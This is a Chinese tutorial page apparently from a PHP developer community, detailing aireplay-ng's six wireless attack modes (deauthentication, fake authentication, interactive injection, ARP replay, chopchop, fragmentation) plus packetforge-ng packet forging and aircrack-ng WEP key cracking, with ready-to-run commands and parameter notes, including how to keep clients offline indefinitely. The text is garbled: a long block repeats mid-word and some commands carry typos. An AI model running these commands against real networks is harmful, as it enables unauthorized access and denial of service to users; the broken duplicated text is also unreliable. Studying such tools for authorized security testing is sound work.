热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

aireplay-ng的6中攻击模式详解

文章标题:aireplay-ng的6中攻击模式详解。Linux是中国IT实验室的一个技术频道。包含桌面应用,Linux系统管理,内核研究,嵌入式系统和开源等一些基本分类

  -0 deautenticate冲突模式

  使已经连接的合法客户端端强制断开与路由器的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效的arp数据。

  如果一个客户端连在路由器上,但是没有人上网来产生有效数据,此时即使用-3也无法产生有效的arp数据,所以就需要用-0攻击模式来配合-3攻击来会被激活

  aireplay-ng -0 10 -a ap_mac -c 合法客户端mac wifi0

  参数说明:10 表示发送次数(设置为0表示循环攻击,客户端无法正常上网)

  -a设置ap的mac地址,-c设置已连接的合法客户端的mac地址(如果要-c则所有与ap连接的客户端全部断线)

  -1 fakeauth count 伪装一个客户端和ap进行连接

  这是没有客户端研究学习的第一步,因为是没有合法连接的客户端,因此需要一个伪装客户端来和路由器连接。为让ap接受数据包,必须使自己的网卡和ap关联。-1伪装客户端连接成功够才能用发送注入命令

  aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0

  参数说明:0表示岩石0秒后连接;-e设置ap_essid;-a设置ap的mac地址 -h设置伪装客户端的网卡mac地址(就是自己网卡的mac地址)

  -2 interactive 交互模式

  这个模式集合了抓包和提取数据,发包注入三种功能

  ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac wifi0

  参数说明:-p设置控制帧中包含的信息(16进制),默认采用0841;-c:设置目标mac地址;-b设置ap的mac地址;-h伪装的客户端网卡mac地址(就是自己的mac地址)

  提取包,发送注入数据包

  aireplay-ng -2 -r myarp -x 1024 wifi0

  参数说明:myarp:自己设置的文件名;-x 1024:发包的速度(最大为1024)

  -3 arp-request注入攻击模式

  这种模式是一种抓包后分析重发的过程

  aireplay-ng -3 -b ap_mac -h 合法客户端mac -x 512 wifi0

  -4 chopchop攻击模式,用来获得一个包含密 aireplay-ng的6中攻击模式详解

  -0 deautenticate冲突模式

  使已经连接的合法客户端端强制断开与路由器的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效的arp数据。

  如果一个客户端连在路由器上,但是没有人上网来产生有效数据,此时即使用-3也无法产生有效的arp数据,所以就需要用-0攻击模式来配合-3攻击来会被激活

  aireplay-ng -0 10 -a ap_mac -c 合法客户端mac wifi0

  参数说明:10 表示发送次数(设置为0表示循环攻击,客户端无法正常上网)

  -a设置ap的mac地址,-c设置已连接的合法客户端的mac地址(如果要-c则所有与ap连接的客户端全部断线)

  -1 fakeauth count 伪装一个客户端和ap进行连接

  这是没有客户端研究学习的第一步,因为是没有合法连接的客户端,因此需要一个伪装客户端来和路由器连接。为让ap接受数据包,必须使自己的网卡和ap关联。-1伪装客户端连接成功够才能用发送注入命令

  aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0

  参数说明:0表示岩石0秒后连接;-e设置ap_essid;-a设置ap的mac地址 -h设置伪装客户端的网卡mac地址(就是自己网卡的mac地址)

  -2 interactive 交互模式

  这个模式集合了抓包和提取数据,发包注入三种功能

  ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac wifi0

  参数说明:-p设置控制帧中包含的信息(16进制),默认采用0841;-c:设置目标mac地址;-b设置ap的mac地址;-h伪装的客户端网卡mac地址(就是自己的mac地址)

  提取包,发送注入数据包

  aireplay-ng -2 -r myarp -x 1024 wifi0

  参数说明:myarp:自己设置的文件名;-x 1024:发包的速度(最大为1024)

  -3 arp-request注入攻击模式

  这种模式是一种抓包后分析重发的过程

  aireplay-ng -3 -b ap_mac -h 合法客户端mac -x 512 wifi0

  -4 chopchop攻击模式,用来获得一个包含密钥数据的xor文件

  aireplay-ng -4 -b ap-mac -h my_mac wifi0

  -5 fragment 碎片包攻击模式,用来获得PRGA(包含密钥的后缀为xor的文件)

  aireplay-ng -5 -b ap_mac -h my_mac wifi0

  packetforge-ng 数据包制造程序

  packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k 255.255.255.255 -l 255.255.255.255 -y niam_xor -w mrarp

  参数说明:-0:伪装arp数据包;-k:设置目标文件ip和端口;-l:设置源文件IP和端口;-y:从xor文件中读取PRGA;name:xor文件的名字;-w设置伪装的arp包的文件名

  aircrack-ng -n 64 -b ap_mac name-01.ivs

  参数说明:-n设置key长度(64/128/256/512)

  钥数据的xor文件

  aireplay-ng -4 -b ap-mac -h my_mac wifi0

  -5 fragment 碎片包攻击模式,用来获得PRGA(包含密钥的后缀为xor的文件)

  aireplay-ng -5 -b ap_mac -h my_mac wifi0

  packetforge-ng 数据包制造程序

  packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k 255.255.255.255 -l 255.255.255.255 -y niam_xor -w mrarp

  参数说明:-0:伪装arp数据包;-k:设置目标文件ip和端口;-l:设置源文件IP和端口;-y:从xor文件中读取PRGA;name:xor文件的名字;-w设置伪装的arp包的文件名

  aircrack-ng -n 64 -b ap_mac name-01.ivs

  参数说明:-n设置key长度(64/128/256/512)


推荐阅读
author-avatar
忄幹_856
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有